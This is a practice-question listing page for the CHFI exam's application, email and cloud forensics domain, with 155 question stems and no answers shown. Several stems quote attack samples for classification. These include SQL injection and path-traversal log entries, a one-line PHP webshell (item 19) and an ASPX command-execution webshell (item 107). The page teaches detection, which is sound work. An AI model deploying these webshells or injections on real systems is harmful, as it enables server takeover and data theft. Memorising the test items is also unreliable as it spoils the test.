Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

HomeCertificationsCHFIDomainsApplication, Email and Cloud Forensics
CHFIFree — No Signup

Application, Email and Cloud Forensics

Practice CHFI Application, Email and Cloud Forensics questions with full explanations on every answer.

155questions

Start practicing

Application, Email and Cloud Forensics — choose a session length

10 questions~10 min20 questions~20 min30 questions~30 min50 questions~50 min

Free · No account required

CHFI Domains

Computer Forensics Investigation ProcessComputer Forensics Fundamentals and ProcessStorage Forensics and File System AnalysisIncident Response and First Responder SkillsComputer Forensics LabEvidence Acquisition and DuplicationOS and Network ForensicsOS and File System ForensicsApplication, Email and Cloud ForensicsMobile and Malware ForensicsNetwork and Cloud ForensicsDatabase and Application ForensicsMalware Forensics

Practice Application, Email and Cloud Forensics questions

10Q20Q30Q50Q

All CHFI Application, Email and Cloud Forensics questions (155)

Start session

Click any question to see the full explanation and answer options, or start a focused practice session above.

1

A security analyst reviews an Apache access log entry: 192.168.1.5 - - [10/Jan/2024:08:12:35 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 4321 "-" "Mozilla/5.0". What type of attack is MOST likely indicated?

2

During an investigation, an analyst extracts email headers from a suspicious email. The header includes: Received: from mail.attacker.com (192.168.1.100); DKIM-Signature: v=1; a=rsa-sha256; d=legitbank.com; s=selector1; bh=...; The email claims to be from support@legitbank.com. Which indicator strongly suggests email spoofing?

3

A forensic analyst is examining a Docker container suspected of being used for malicious activities. The container was running an Alpine Linux image and was stopped 2 hours ago. Which of the following is the BEST first step to collect volatile evidence?

4

A cloud forensics investigator is analyzing an incident in AWS. The suspect is alleged to have deleted an S3 bucket. Which AWS service log would contain the DeleteBucket API call details, including the source IP and user identity?

5

Which tool is specifically designed to analyze email headers and track the path an email took across mail servers?

6

An investigator examining a compromised web server finds a file named shell.aspx in the uploads directory. The file contains code that accepts commands via HTTP POST and executes them on the server. What is the MOST likely type of attack?

7

A forensic examiner needs to analyze a Microsoft Outlook PST file from a suspect's computer. Which tool is BEST suited to parse and extract emails, attachments, and metadata from the PST file?

8

An organization uses Azure. A security analyst needs to investigate a suspicious login event. Which Azure log contains details about user sign-ins, including IP address, timestamp, and success/failure status?

9

In database forensics, which type of log records every transaction (including INSERT, UPDATE, DELETE) and allows reconstruction of database changes over time?

10

An analyst finds the following in an IIS log: 10.0.0.5, -, 02/15/2024, 14:23:56, GET /../../windows/system32/cmd.exe, 404, 0, 0, 0, Mozilla/4.0. Which attack technique does this log entry represent?

11

During a cloud forensic investigation, the analyst discovers that the suspect used AWS IAM credentials to launch unauthorized EC2 instances. The suspect claims the credentials were stolen. Which log would the analyst examine to determine the source IP address from which the credentials were used?

12

Which of the following is a significant challenge in cloud forensics compared to traditional digital forensics?

13

Which TWO pieces of information can be obtained from an email's Received headers to help trace the email's origin? (Select TWO)

14

Which THREE of the following are common challenges specific to cloud forensics? (Select THREE)

15

Which TWO of the following are indicators of a webshell attack found in web server logs? (Select TWO)

16

An analyst examining Apache access logs finds the following entry: 192.168.1.10 - - [10/Oct/2023:13:55:36 -0400] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5324 "-" "Mozilla/5.0". Which of the following attacks is MOST likely occurring?

17

During a forensic investigation of a suspected data breach, you are asked to analyze email headers to trace the origin of a phishing email. Which header field provides the IP address of the sending SMTP server?

18

A security analyst is investigating a containerized application running on a Docker host. The analyst needs to collect forensic evidence from a stopped container without starting it. Which of the following Docker commands should be used to export the container's filesystem as a tar archive?

19

While investigating a compromised web server, you discover a file named 'shell.php' in the web root. The file contains the following code: <?php system($_GET['cmd']); ?>. Which of the following best describes this file?

20

An incident responder is analyzing AWS CloudTrail logs to determine if an unauthorized user accessed an S3 bucket. Which of the following CloudTrail event fields should be examined to identify the IAM user or role that made the API call?

21

A forensic analyst is examining a Microsoft Outlook PST file as part of an email investigation. Which tool is specifically designed to parse and analyze PST files and extract email metadata?

22

In cloud forensics, one of the major challenges is that data may be stored in multiple jurisdictions with different legal requirements. This challenge is known as:

23

An analyst finds the following entry in an IIS access log: 10.0.0.5, -, 10/10/2023, 14:30:22, W3SVC1, WEB01, 192.168.1.100, 80, GET, /login.aspx, 200, 0, 1234, 567, Mozilla/5.0+. Based on the log format, which field contains the HTTP status code?

24

Which of the following tools is specifically designed to analyze email headers and track the path of an email, providing information about delays and potential spoofing?

25

During a database forensic investigation, you need to review Microsoft SQL Server transaction logs to identify unauthorized data modifications. Which of the following SQL Server functions or commands is used to read the transaction log?

26

An analyst is investigating a possible data exfiltration via email. The analyst notices that the email headers contain a DKIM-Signature field that is invalid. Which of the following does a failed DKIM check indicate?

27

A forensic investigator needs to collect evidence from a Google Cloud Platform (GCP) environment. Which of the following GCP services provides audit logs for administrative activities and data access?

28

Which TWO of the following are common indicators of a path traversal attack found in web server logs? (Select 2)

29

Which THREE of the following are challenges specific to cloud forensics compared to traditional digital forensics? (Select 3)

30

Which TWO of the following are valid email header fields that can be used to detect email spoofing? (Select 2)

31

An analyst examines the following Apache access log entry: 192.168.1.10 - - [10/Jan/2023:13:45:22 +0000] "GET /search.php?q=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0". Which attack is MOST likely indicated?

32

During a forensic investigation of a compromised web server, you find the following entry in the IIS log: 192.168.2.50, -, 10/Jan/2023, 14:32:15, W3SVC1, WEB01, 192.168.2.10, 80, POST, /uploads/shell.aspx, 200, 0, 0, 513, 0, Mozilla/4.0. Which action should the investigator prioritize?

33

In a database forensic investigation, you recover a MySQL binary log with the following entry: #230110 13:45:22 server id 1 end_log_pos 123456 Query thread_id=100 exec_time=0 error_code=0 SET TIMESTAMP=1673358322; SELECT * FROM customers INTO OUTFILE '/tmp/export.csv';. What does this indicate?

34

Which tool is specifically designed for parsing and analyzing email headers to trace the origin of an email and detect spoofing?

35

An email header shows the following Received line: Received: from mail.example.com (192.168.1.1) by smtp.server.com (Postfix). The DKIM-Signature header is missing, and the X-Originating-IP header shows an IP address different from the sender's domain MX record. What is the MOST likely conclusion?

36

During a cloud forensic investigation, you review AWS CloudTrail logs and find the following event: {"eventSource":"ec2.amazonaws.com","eventName":"RunInstances","userIdentity":{"arn":"arn:aws:iam::123456789012:user/attacker"},"requestParameters":{"instanceType":"t2.micro","imageId":"ami-0abcdef1234567890"},"responseElements":{"instancesSet":{"items":[{"instanceId":"i-0a1b2c3d4e5f67890"}]}}}. What is the immediate forensic action?

37

In Docker forensics, which command is used to view the command history of a container, including how it was built?

38

A security analyst finds the following entry in the Apache access log: 10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0". Which attack was attempted?

39

Which of the following email headers is used to verify the domain of the sending server and is commonly used for authentication to prevent spoofing?

40

In cloud forensics, which AWS service logs API calls for governance, compliance, and operational auditing, and is the primary source for detecting unauthorized access?

41

During a forensic investigation of a Microsoft SQL Server, you find the transaction log contains the following: LOP_BEGIN_XACT, LOP_INSERT_ROWS, LOP_COMMIT_XACT for a table named 'CreditCards', with a timestamp just before a known data breach. The log also shows a bulk insert operation. What does this indicate?

42

In email forensics, which artifact is stored in Outlook's Personal Folders (.pst) files and can be analyzed using tools like Aid4Mail or EmailTracker?

43

Which TWO of the following are common challenges specific to cloud forensics? (Select TWO)

44

Which THREE of the following are indicators of a webshell in web server logs? (Select THREE)

45

Which TWO of the following are valid methods to collect logs from Docker containers for forensic analysis? (Select TWO)

46

A security analyst reviews an Apache access log and finds the entry: '192.168.1.10 - - [10/Mar/2025:08:12:34 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 2345 "-" "Mozilla/5.0"'. Which attack is indicated?

47

Which email header field is MOST reliable for identifying the true origin of an email, assuming no header tampering occurred at the initial MTA?

48

During a cloud forensic investigation, an analyst discovers that an AWS EC2 instance was used to launch an attack. The instance has been terminated. Which source is MOST likely to contain evidence of the commands executed on the instance?

49

An analyst examining an Outlook PST file wants to recover deleted emails that are no longer visible in the Deleted Items folder. Which technique is MOST effective?

50

A web server log shows the following request: 'GET /../../../../etc/passwd HTTP/1.1' with a 200 response code. The web server is running Apache on Linux. What attack has likely succeeded?

51

Which cloud forensic challenge refers to the inability to physically access the storage media where data resides?

52

A forensic analyst is investigating a Docker container that was used to launch a network attack. The container has been stopped but not removed. Which action should the analyst take FIRST to preserve volatile evidence?

53

An email investigator receives a suspicious email and examines the headers. The 'Received-SPF: pass (google.com: domain of example.com designates 203.0.113.5 as permitted sender)' header is present. However, the 'From' address is 'admin@example.com' and the 'Return-Path' is 'admin@example.com'. What does this indicate?

54

Which tool is specifically designed to analyze email headers and track the path of an email across multiple servers?

55

A forensic analyst is investigating a MySQL database server breach. Which log is MOST useful for identifying a series of queries that exfiltrated data, assuming the attacker used a compromised application account?

56

An analyst discovers a suspicious file named 'cmd.aspx' in the uploads directory of an IIS web server. Analysis reveals the file contains code to execute system commands. What is this file most likely?

57

Which Azure log source should an investigator query to identify who deleted a virtual machine and when?

58

A security analyst is investigating a phishing email and notices the DKIM-Signature header is present but fails validation. Which TWO actions should the analyst take?

59

A cloud forensic investigator is analyzing a GCP audit log entry for a Compute Engine instance. Which THREE fields are essential for identifying the user and operation performed?

60

A forensic analyst is examining a Docker container image for malware. Which TWO techniques can help analyze the image layers?

61

During a forensic investigation of a compromised web server, an analyst examines the Apache access log and finds the following entry: '192.168.1.10 - - [12/Oct/2024:13:45:22 +0000] "GET /index.php?id=1 UNION SELECT username, password FROM users-- HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. What type of attack is MOST likely indicated?

62

An email forensic analyst receives a suspicious email and examines the full headers. Which header field is the MOST reliable for determining the true originating IP address of the sender, assuming no spoofing of the header?

63

In a Docker container forensics investigation, an analyst needs to examine the file system of a stopped container to look for malicious artifacts. Which command should the analyst run to create a recoverable snapshot of the container's file system without starting the container?

64

A cloud forensic investigator is examining AWS CloudTrail logs for signs of unauthorized access to an S3 bucket. Which of the following CloudTrail event names would indicate a successful attempt to list the objects in the bucket?

65

An investigator is analyzing a compromised MySQL database server. To determine the exact time and content of a suspect data exfiltration query, which MySQL log should be examined first, assuming it is enabled?

66

A forensic analyst needs to extract email artifacts from a Microsoft Outlook .OST file that is associated with an Exchange account. Which tool is specifically designed to parse and analyze .OST files?

67

During a forensic investigation of a Google Cloud Platform (GCP) environment, an analyst reviews Audit Logs and sees a log entry with the method 'storage.objects.list' and a principal email 'attacker@gmail.com'. However, the identity is not from the organization's domain. What should the analyst conclude?

68

An investigator examines an email header and sees the following: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...'. The email claims to be from 'support@example.com', but the DKIM signature validation fails. Which of the following is the MOST likely cause?

69

Which tool is commonly used to analyze email headers and trace the path of an email across servers by parsing 'Received' fields?

70

In an Azure environment, a forensic analyst needs to identify which user assigned a specific role to another user, leading to privilege escalation. Which Azure log should the analyst examine?

71

An analyst discovers a suspicious file named 'cmd.aspx' in the web root of an IIS server. The file contains ASPX code that executes system commands. The IIS logs show a POST request to '/cmd.aspx' with a 200 status code. Which type of attack is indicated?

72

Which of the following is a primary challenge in cloud forensics due to the shared responsibility model?

73

Which TWO of the following are valid indicators of email spoofing when analyzing email headers?

74

Which THREE of the following are challenges specific to container forensics?

75

Which TWO of the following are appropriate techniques for identifying a webshell on a compromised web server?

76

An analyst reviews an Apache access log entry: '192.168.1.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 1234 "-" "Mozilla/5.0"'. Which attack does this log entry most likely indicate?

77

Which email header field is used to verify that an email was sent by the authorized mail server for the domain and has not been tampered with, using cryptographic signatures?

78

A forensic investigator examining a compromised Linux server finds a base64-encoded string in the Apache access log: 'GET /cgi-bin/test.cgi?cmd=ZWNobyAiPD9waHAgc3lzdGVtKCRfR0VUW2NtZF0pOyA/PiI+...' After decoding, the string contains a PHP webshell. Which of the following is the MOST effective method to confirm the webshell was executed on the server?

79

During a cloud forensic investigation, an analyst needs to identify who deleted an S3 bucket in an AWS environment. Which AWS service log should the analyst examine to find the API call and the associated IAM user or role?

80

An email forensic analyst receives a suspicious email and wants to verify the originating IP address. The analyst extracts the email headers and sees multiple 'Received' fields. Which 'Received' header should the analyst consider as the most trustworthy source of the sender's IP?

81

Which tool is specifically designed to extract and analyze metadata from email messages, including headers, attachments, and embedded objects, for forensic investigations?

82

A forensic examiner is investigating a Docker container suspected of being used for malicious activity. Which of the following is the BEST approach to collect volatile evidence from the container without altering its state?

83

During an investigation of a web application breach, an analyst reviews IIS logs and finds numerous entries with status code '200' and URIs containing '?cmd=' followed by encoded strings. The analyst also notices that some requests have a 'User-Agent' string resembling 'Microsoft-CryptoAPI/10.0'. What is the MOST likely conclusion?

84

An investigator needs to analyze a Microsoft Outlook PST file from a suspect's computer. Which of the following tools is specifically designed for parsing and extracting emails, attachments, and metadata from PST files in a forensically sound manner?

85

In the context of cloud forensics, what is the primary challenge associated with volatile evidence in Infrastructure as a Service (IaaS) environments?

86

An analyst is investigating a data exfiltration incident. The MySQL transaction logs show a series of unusual SELECT queries retrieving large amounts of data from the 'customers' table, executed by a user account 'webapp'. What should the analyst check NEXT to determine if the data was actually exfiltrated?

87

A forensic investigator is analyzing a compromised web server. In the Apache access logs, the investigator finds the following request: 'GET /images/../../../etc/passwd HTTP/1.1' with a 200 status code. Which of the following is the MOST likely reason the server returned a 200 (OK) response?

88

A forensic analyst is examining a Google Cloud Platform (GCP) environment after a security incident. Which TWO GCP services should the analyst use to audit API activity and resource changes? (Select TWO.)

89

In an email forensics investigation, which THREE indicators suggest that an email is likely spoofed? (Select THREE.)

90

A security analyst is investigating a potential container escape from a Docker container. Which THREE artifacts should the analyst collect to analyze the incident? (Select THREE.)

91

A security analyst reviews Apache access logs and finds the following entry: `192.168.1.10 - - [12/Jul/2024:10:15:30 -0400] "GET /search.php?q=1' UNION SELECT username,password FROM users-- HTTP/1.1" 200 5321 "-" "Mozilla/5.0"`. Which attack technique is most likely being attempted?

92

During an email forensics investigation, an analyst examines headers and sees `Received: from mail.evil.com (192.168.1.100) by mail.victim.com` followed by `DKIM-Signature: v=1; a=rsa-sha256; d=evil.com; s=selector; bh=...; h=...; b=...`. The email claims to be from support@paypal.com. Which finding is the strongest indicator of spoofing?

93

Which tool is specifically designed to extract and analyze email metadata, including headers, from various email client formats such as PST and OST files?

94

A forensic analyst is investigating a suspected data exfiltration from a MySQL database. Which log source would be MOST useful to identify the exact SQL queries executed, including SELECT statements that retrieved large volumes of data?

95

In an AWS environment, a security analyst detects unusual API calls that created several IAM users with administrative privileges from an unfamiliar IP address. Which AWS service log should be examined first to identify the specific API calls and the IAM user that made them?

96

Which of the following is a unique challenge in cloud forensics compared to traditional digital forensics?

97

During a Docker forensics investigation, an analyst needs to identify the commands executed within a deleted container. Which of the following approaches is MOST effective to retrieve this information?

98

An IIS log entry shows: `2024-07-15 14:22:10 10.0.0.5 GET /../../windows/system32/cmd.exe 404 - Mozilla/5.0`. What attack technique does this log entry indicate?

99

In an email header, which field typically contains the IP address of the original sending client?

100

A forensic investigator finds a suspicious file named `cmd.aspx` in the web root of a compromised IIS server. The file contains code that accepts command input via HTTP GET parameters and executes it on the server. What is the MOST likely classification of this file?

101

In a Google Cloud Platform (GCP) environment, a forensic investigator needs to determine who deleted a Cloud Storage bucket and when. Which log type should be queried to obtain this information?

102

Which of the following email authentication protocols uses a digital signature to verify the sender's domain and that the email has not been tampered with?

103

A forensic analyst is examining Azure Activity Logs for signs of privilege escalation. Which TWO of the following activities would be MOST indicative of an attacker attempting to escalate privileges? (Choose two.)

104

During a forensic analysis of a compromised web server, an investigator identifies the following log entries. Which THREE entries are the strongest indicators of a successful web shell upload? (Choose three.)

105

An investigator is analyzing email headers and notices the following: The 'Received' headers show a path through multiple servers, the 'DKIM-Signature' domain matches the sender domain, and 'X-Originating-IP' is present. Which TWO pieces of information are MOST useful to trace the original sender's IP address? (Choose two.)

106

A security analyst reviews the following Apache access log entry: 192.168.1.10 - - [15/May/2025:10:15:23 +0000] "GET /search.php?q=1'%20OR%20'1'='1 HTTP/1.1" 200 5321 "-" "Mozilla/5.0". Which type of attack is most likely indicated?

107

During a forensic investigation of a compromised web server, you find a file named 'cmd.aspx' in the uploads directory. The file contains: <%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c "+Request.QueryString["cmd"])).StandardOutput.ReadToEnd(); %>. What is the most likely purpose of this file?

108

In MySQL forensics, which log file is most commonly used to detect unauthorized data exfiltration or changes to database records?

109

Which email header field is specifically used to verify that an email was not tampered with during transit and is signed by the sender's domain?

110

An investigator needs to parse and analyze a Microsoft Outlook personal folders file (.pst). Which tool is specifically designed for this purpose?

111

In cloud forensics, which AWS service provides a centralized log of API calls made by users and services, often used to investigate unauthorized access or configuration changes?

112

A forensic analyst is examining a Docker container that was used to launch a DDoS attack. Which layer of a Docker image is most likely to contain the attacker's malicious scripts?

113

Which of the following is a primary challenge in cloud forensics due to shared infrastructure?

114

An analyst finds the following string in an IIS log: %3Cscript%3Ealert('XSS')%3C/script%3E. What does this indicate?

115

Which tool is specifically designed to extract metadata from email messages, including tracking the route and identifying the originating IP address?

116

In an email header, an analyst notices the following: 'Received: from mail.attacker.com (192.168.2.100) by mail.victim.com (Postfix) with ESMTP id ABC123 for <user@victim.com>; ...'. The 'From' address appears as 'ceo@victim.com'. Which type of attack is most likely?

117

Which cloud service's audit logs would an investigator examine to identify who deleted a virtual machine in an Azure subscription?

118

Which TWO of the following are indicators of a webshell on a web server? (Select TWO.)

119

Which THREE of the following are challenges specific to container forensics? (Select THREE.)

120

In email forensics, which TWO of the following headers are most useful for identifying the true origin of an email? (Select TWO.)

121

A security analyst is reviewing Apache access logs and finds the entry: 192.168.1.100 - - [10/Mar/2025:08:12:34 +0000] "GET /search?q=test' OR '1'='1 HTTP/1.1" 200 532. Which attack does this log entry most likely indicate?

122

During an investigation of a suspected data exfiltration, a forensic analyst examines MySQL general query logs and finds a large number of SELECT queries retrieving customer records, followed by DELETE queries. Which of the following is the most likely conclusion?

123

An incident responder is analyzing a compromised web server and finds a file named 'cmd.aspx' in the uploads directory. The file contains ASP.NET code that accepts commands via the 'cmd' parameter and executes them on the server. Which of the following best describes this artifact?

124

An email forensic analyst receives a suspicious email and wants to trace its origin. Which email header field provides the most reliable information about the IP address of the sending SMTP server?

125

During a cloud forensics investigation of an AWS environment, an analyst extracts CloudTrail logs and notices many events with the error code 'AccessDenied' for a specific IAM user attempting to list an S3 bucket. Which of the following is the most appropriate next step?

126

A forensic analyst is examining Docker container logs and finds a container that ran the command 'rm -rf /' and then stopped. The container was based on a custom image. Which of the following is the most effective way to recover deleted files from the container's filesystem?

127

A forensic analyst is reviewing Microsoft IIS logs and finds the entry: 192.168.1.50, -, 10/Feb/2025:14:22:10 +0000, GET /scripts/..%c1%af../winnt/system32/cmd.exe, 404. Which attack technique is indicated by the encoded characters in the URI?

128

Which of the following tools is specifically designed for parsing and analyzing email headers to detect spoofing and trace the origin of an email?

129

In an Azure environment, an investigator needs to review actions performed by a specific user over the past 30 days. Which Azure service provides the necessary audit logs for this purpose?

130

A forensic analyst is examining a PST file extracted from a suspect's computer. The analyst wants to recover deleted emails that are no longer visible in the Outlook folder hierarchy. Which approach is most effective?

131

Which of the following is a primary challenge in cloud forensics due to the shared responsibility model?

132

During a database forensic investigation, a MSSQL transaction log analysis reveals a series of INSERT statements that added records to a customer table, followed by a TRUNCATE TABLE statement. What does this pattern most likely indicate?

133

A forensic analyst is investigating a web application that was defaced. The Apache access logs show the following entries: (1) GET /cgi-bin/test.cgi HTTP/1.1 with status 200, (2) POST /cgi-bin/test.cgi HTTP/1.1 with status 200, (3) GET /index.html HTTP/1.1 with status 200, (4) GET /images/ HTTP/1.1 with status 301. Which TWO log entries are most suspicious and indicate a likely attack vector?

134

An email investigation reveals that a phishing email was sent from a domain that uses DKIM and SPF. The email headers contain: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...' and 'Received-SPF: pass (example.com: domain of sender@example.com designates 203.0.113.5 as permitted sender)'. Which TWO conclusions can be drawn?

135

A security analyst is investigating a potential data breach in a GCP environment. The analyst reviews the GCP audit logs and finds the following events: (1) A service account was granted the 'roles/storage.objectAdmin' role on a storage bucket containing sensitive data, (2) The service account then listed objects in the bucket, (3) The service account downloaded several objects. Which THREE actions should the analyst take immediately?

136

A security analyst reviewing Apache access logs finds entries like: 192.168.1.10 - - [12/Jan/2023:15:23:11 +0000] "GET /search?q=1' OR '1'='1 HTTP/1.1" 200 5324. What attack is indicated?

137

Which tool is specifically designed to analyze email headers, track the path of an email, and extract metadata such as originating IP and authentication results?

138

During a cloud forensics investigation, an analyst examines AWS CloudTrail logs and finds an event with "userIdentity":{"type":"AssumedRole","arn":"arn:aws:sts::123456789012:assumed-role/AdminRole/i-0abcd1234efgh5678"}. What does the 'i-0abcd1234efgh5678' portion most likely represent?

139

An email header contains the following line: "Received: from mail.evil.com (192.0.2.1) by mail.victim.com with ESMTP; Mon, 20 Mar 2023 10:00:00 -0500". The next Received line shows a different IP. What does this indicate?

140

In Docker forensics, which of the following commands would you use to inspect the history of an image, including the commands that created each layer?

141

An investigator needs to recover deleted emails from a Microsoft Outlook PST file. Which forensic technique is most appropriate?

142

A forensic analyst is investigating a webshell on an IIS server. The access.log shows: 10.0.0.5, -, 12/Mar/2023:14:22:10 +0000, POST /uploads/cmd.aspx, 200, 0, 1234. Which log entry is most indicative of webshell activity?

143

Which cloud service log is most appropriate for tracking API calls and resource changes in an AWS environment?

144

A forensic analyst is examining MySQL binary logs to identify a data exfiltration event. Which TWO fields are most critical for reconstructing the stolen data?

145

An Azure Activity Log shows a suspicious 'Delete Virtual Machine' operation from an IP address in a foreign country. Which THREE actions should the forensic investigator take immediately to preserve evidence and assess impact?

146

A security analyst notices repeated entries in an IIS log: 10.0.0.2, -, 05/Feb/2023:08:12:34 +0000, GET /../../windows/system32/config/sam, 404, 0, 532. Which TWO of the following attack types are indicated by this log entry?

147

Which TWO tools are commonly used for email forensic analysis and metadata extraction?

148

A Docker container is suspected of malicious activity. Which THREE data sources should the investigator collect for forensic analysis?

149

A GCP audit log shows a project owner granted 'iam.serviceAccountUser' role to a service account from a different project. Which TWO potential security implications should the investigator prioritize?

150

Which TWO of the following are common challenges specific to cloud forensics?

151

A security analyst is reviewing Apache access logs and finds repeated requests to /index.php?id=1' OR '1'='1. Which type of attack is MOST likely being attempted?

152

During a forensic investigation of a compromised web server, an analyst finds the following entry in the IIS access log: 192.168.1.5, -, 04/May/2024:14:23:11, GET /scripts/..%5c../windows/system32/cmd.exe, 200. What is the probable attack vector?

153

An email forensic investigator examines a suspicious email and notices the following header: Received: from mail.evil.com (192.168.1.100) by mail.company.com. The DKIM-Signature header fails verification. What does this indicate?

154

Which TWO of the following are common challenges in cloud forensics that are not typically encountered in traditional on-premises forensics?

155

An incident response team is investigating a breach involving a Docker container. Which THREE of the following actions should the team take to preserve forensic evidence?

Practice all 155 Application, Email and Cloud Forensics questions

Other CHFI exam domains

Computer Forensics Investigation ProcessComputer Forensics Fundamentals and ProcessStorage Forensics and File System AnalysisIncident Response and First Responder SkillsComputer Forensics LabEvidence Acquisition and DuplicationOS and Network ForensicsOS and File System ForensicsMobile and Malware ForensicsNetwork and Cloud ForensicsDatabase and Application ForensicsMalware Forensics

Frequently asked questions

What does the Application, Email and Cloud Forensics domain cover on the CHFI exam?

The Application, Email and Cloud Forensics domain covers the key concepts tested in this area of the CHFI exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CHFI domains — no account required.

How many Application, Email and Cloud Forensics questions are in the CHFI question bank?

The Courseiva CHFI question bank contains 155 questions in the Application, Email and Cloud Forensics domain. Click any question to see the full explanation and answer breakdown.

What is the best way to practice Application, Email and Cloud Forensics for CHFI?

Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.

Can I practice only Application, Email and Cloud Forensics questions for CHFI?

Yes — the session launcher on this page draws questions exclusively from the Application, Email and Cloud Forensics domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.

Free forever · No credit card required

Track your CHFI domain progress

Save your results, see per-domain analytics, and get readiness scores — free, for every certification.

Sign Up Free

Free forever · Every certification included

Practice Session

10 questions20 questions30 questions50 questions

Study Resources

All DomainsPractice TestMock ExamFlashcardsStudy Guide

Related Exams

CEHCS0-003CISA